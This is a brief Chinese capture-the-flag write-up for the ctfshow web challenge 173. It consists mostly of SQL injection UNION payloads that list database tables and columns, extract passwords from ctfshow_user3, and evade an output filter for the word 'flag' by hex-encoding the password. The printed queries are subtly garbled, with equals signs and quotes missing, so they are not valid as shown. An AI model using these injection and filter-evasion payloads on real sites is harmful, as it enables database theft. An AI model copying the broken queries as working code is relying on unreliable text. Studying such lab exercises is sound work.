ctf show web 入门173

1 union select 1,table_name,3 from information_schema.tables where table_schemadatabase()--1 union select 1,column_name,3 from information_schema.columns where table_namectfshow_user3--这里跟上一题的不同之处在于1.原本只查询了username, password两个字段现在变成了id, username, password三个字段所以payload要改变为-1 union select 1, hack, password from ctfshow_user3 where usernameflag--2.上一关只是检查username是不是flag。而这一关它把整个返回的数组$ret转换成了 JSON 字符串然后用正则表达式模糊匹配只要任何一个角落包含f-l-a-g四个字母就不行preg_match(/flag/i, ...)检查这意味着只要最终返回给前端的整行数据里包含“flag”这四个字母不区分大小写就会直接触发拦截比如假设密码中有flag也会把回显的内容过滤掉此时我们使用HEX(password)把返回的密码编码从而绕过限制